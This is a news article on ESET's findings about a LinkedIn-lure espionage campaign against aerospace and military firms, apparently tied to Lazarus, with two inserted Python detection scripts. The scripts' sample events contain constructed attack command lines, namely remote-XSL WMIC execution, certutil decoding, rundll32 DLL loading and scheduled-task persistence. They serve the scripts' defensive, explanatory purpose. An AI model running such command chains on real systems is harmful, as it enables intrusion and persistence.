Aerospace, Military Hit in Ongoing Espionage Campaign Linked to North Korea

Organizations in the aerospace and military sectors were compromised in a highly targeted cyber-espionage campaign that shows a possible link to North Korean hackers, ESET reveals.

Active since September 2019 and still ongoing, Operation In(ter)ception hit companies in Europe and the Middle East through fake accounts on LinkedIn that posted bogus job offers. The attacks appear to have been focused mainly on espionage, but a business email compromise attempt was also discovered.

The threat actor behind these attacks remains unknown, but ESET believes it could be linked to the infamous North Korean state-sponsored group Lazarus, based on targeting, the use of fake LinkedIn accounts, development tools, and anti-analysis methods. Furthermore, one of the observed stage 1 malware variants carried a sample of Lazarus-attributed NukeSped.

“The attacks we investigated showed all the signs of espionage, with several hints suggesting a possible link to the infamous Lazarus group. However, neither the malware analysis nor the investigation allowed us to gain insight into what files the attackers were aiming for,” ESET researcher Dominik Breitenbacher comments.

Fake LinkedIn accounts claiming to be HR representatives at well-known aerospace and defense companies such as U.S.-based Collins Aerospace (formerly Rockwell Collins) and General Dynamics were created for each of the targeted organizations.

Attractive bogus jobs were offered and, once the victim’s attention was captured, the attackers sent over password-protected archives containing LNK files that started a command prompt to open a decoy PDF in the browser.

Unbeknown to the victim, the command prompt created a new folder on the machine, copied the WMIC.exe utility to it, and set up persistence for it via a scheduled task. WMIC was used to interpret remote XSL scripts, certutil for payload decoding, and rundll32/regsvr32 for malware execution.
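The execution chain described above (a system utility copied to a new folder and persisted through a scheduled task, WMIC loading a remote XSL stylesheet, certutil decoding a payload, rundll32/regsvr32 running a DLL from a user-writable path) leaves a recognisable trail in process-creation telemetry. The following Python is an added detection example, not ESET's code or any indicator from their report: it runs a handful of rules over constructed Sysmon-style process events. All paths, task names and URLs in the sample events are made up for illustration.

```python
import re
from typing import Dict, List

# Legitimate copies of these binaries live under the Windows system directories;
# a copy anywhere else is what the campaign's "copy WMIC.exe to a new folder" step produces.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
LOLBINS = {"wmic.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")
TASK_CMD_RE = re.compile(r'/tr\s+"?([^"\s]+)')  # the program a schtasks /create task will run


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_system_dir(path: str) -> bool:
    return any(path.lower().startswith(d) for d in SYSTEM_DIRS)


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the list of rule hits for one process-creation event."""
    image, cmd = event["Image"], event["CommandLine"]
    name, c = basename(image), cmd.lower()
    hits: List[str] = []

    # Rule 1: a living-off-the-land binary executed from outside the system directory.
    if name in LOLBINS and not in_system_dir(image):
        hits.append(f"{name} executed outside the system directory: {image}")

    # Rule 2: WMIC asked to apply an XSL stylesheet fetched from a URL.
    if name == "wmic.exe" and ".xsl" in c and ("http://" in c or "https://" in c):
        hits.append("wmic loading an XSL stylesheet from a remote URL")

    # Rule 3: certutil used as a decoder rather than for certificate management.
    if name == "certutil.exe" and "-decode" in c:
        hits.append("certutil decoding a file")

    # Rule 4: rundll32/regsvr32 loading a module from a user-writable location.
    if name in ("rundll32.exe", "regsvr32.exe") and any(d in c for d in USER_WRITABLE):
        hits.append(f"{name} loading a module from a user-writable path")

    # Rule 5: scheduled task whose action is a relocated copy of a system utility.
    if name == "schtasks.exe" and "/create" in c:
        m = TASK_CMD_RE.search(c)
        if m and basename(m.group(1)) in LOLBINS and not in_system_dir(m.group(1)):
            hits.append(f"scheduled task persists a relocated {basename(m.group(1))}: {m.group(1)}")
    return hits


def scan(events: List[Dict[str, str]]) -> List[List[str]]:
    """Evaluate every event; the result list is aligned with the input list."""
    return [evaluate(e) for e in events]


# Constructed sample telemetry (not real events): one benign WMIC call followed by
# the four suspicious steps the article describes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Microsoft\Office\wmic.exe",
     "CommandLine": r'wmic.exe os get /format:"https://cdn.example.invalid/office.xsl"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 30 /tn "Office Sync" '
                    r'/tr "C:\Users\jdoe\AppData\Local\Microsoft\Office\wmic.exe os get /format:..."'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode C:\ProgramData\Sync\update.txt C:\ProgramData\Sync\update.dll"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\Sync\update.dll,Start"},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(basename(event["Image"]), "->", hits or "no findings")
```

Each rule on its own produces noise in some environments (administrators do decode files with certutil), so the value lies in correlating several hits on one host within a short window; in the sample, the relocated WMIC copy triggers two rules on a single event and a third when the scheduled task is created.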

The attackers used a multitude of malicious tools, including a custom downloader (stage 1) and a backdoor (stage 2), a modified version of PowerShell, custom DLL loaders, a beacon DLL, and a custom build of the open-source command-line client for Dropbox dbxcli.

PowerShell commands were used for reconnaissance, such as querying Active Directory for a list of employees, including administrator accounts (which were later brute-forced).
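Brute-forcing of administrator accounts enumerated from Active Directory shows up as bursts of failed logons (Windows Security event 4625) against a small set of privileged names. The Python below is an added example, not part of ESET's report: it parses constructed 4625 log lines, counts failures per account in a sliding time window, and raises an alert when the count crosses a threshold, marking whether the account belongs to a (constructed) list of privileged accounts. The log format, account names and addresses are made up for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set, Tuple

# Constructed flat log format: "<ISO timestamp> EventID=4625 TargetUserName=<user> IpAddress=<ip>"
LOG_RE = re.compile(r"(?P<ts>\S+) EventID=4625 TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)")
WINDOW = timedelta(minutes=5)   # sliding window length
THRESHOLD = 10                  # failures within the window that trigger an alert

Event = Tuple[datetime, str, str]


def parse_4625(line: str) -> Optional[Event]:
    """Return (timestamp, account, source ip) for a failed-logon line, None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m.group("ts")), m.group("user"), m.group("ip")


def max_failures_in_window(times: List[datetime], window: timedelta = WINDOW) -> int:
    """Largest number of failures that fall inside any window-sized interval (two-pointer sweep)."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_password_guessing(events: List[Event], admin_accounts: Set[str],
                             threshold: int = THRESHOLD, window: timedelta = WINDOW) -> Dict[str, dict]:
    """Alert per account whose failure burst reaches the threshold; flag privileged targets."""
    by_account: Dict[str, List[datetime]] = defaultdict(list)
    for ts, account, _ip in events:
        by_account[account].append(ts)
    alerts = {}
    for account, times in by_account.items():
        n = max_failures_in_window(times, window)
        if n >= threshold:
            alerts[account] = {"failures": n, "privileged": account in admin_accounts}
    return alerts


# Constructed sample log: 12 failures in under three minutes against a privileged
# service account, three scattered failures for an ordinary user, and one unrelated event.
_base = datetime(2020, 1, 15, 9, 0, 0)
SAMPLE_LOG = (
    [f"{(_base + timedelta(seconds=15 * i)).isoformat()} EventID=4625 "
     f"TargetUserName=svc-backup IpAddress=10.0.0.5" for i in range(12)]
    + [f"{(_base + timedelta(minutes=m)).isoformat()} EventID=4625 "
       f"TargetUserName=jdoe IpAddress=10.0.0.7" for m in (0, 20, 50)]
    + [f"{_base.isoformat()} EventID=4624 TargetUserName=jdoe IpAddress=10.0.0.7"]
)
ADMIN_ACCOUNTS = {"svc-backup", "administrator"}  # constructed list of privileged accounts


def run_sample() -> Dict[str, dict]:
    events = [e for e in map(parse_4625, SAMPLE_LOG) if e is not None]
    return detect_password_guessing(events, ADMIN_ACCOUNTS)


if __name__ == "__main__":
    for account, info in run_sample().items():
        print(f"ALERT {account}: {info['failures']} failures in {WINDOW}, privileged={info['privileged']}")
```

In practice the privileged-account list would come from the same directory query the attackers ran (group membership of administrative groups), which is also why a sudden spike in LDAP queries enumerating those groups is worth alerting on in its own right.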

ESET’s security researchers also discovered that the threat actor put a lot of effort into remaining undetected: files and folders were named so that they would seem legitimate, malware components were digitally signed, the stage 1 downloader was recompiled multiple times, and anti-analysis techniques were implemented in the malware.

The Dropbox client dbxcli was used for data exfiltration. The researchers could not determine which files the attackers were after, but believe they might have targeted technical and business-related information.

As part of one attack, the adversary also attempted to perform business email compromise, by tricking a victim company’s customer into sending the payment for a pending invoice to an attacker-controlled account. The attack, however, was unsuccessful, as the customer became suspicious.

WMI commands were likely used for lateral movement within the compromised environments, but the attackers removed deployed files from the hacked computers after moving to new systems.

“Our research into Operation In(ter)ception shows again how effective spearphishing can be for compromising a target of interest. […] Unafraid of direct contact, the attackers chatted with the victims to convince them to open malicious files. Once they succeeded, they had their initial foothold inside the victim companies,” ESET notes.

Related: U.S. Cyber Command Shares More North Korean Malware Variants

Related: North Korean Hackers Continue to Target Cryptocurrency Exchanges

Related: Europol on Methodology Behind Successful Spear Phishing Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.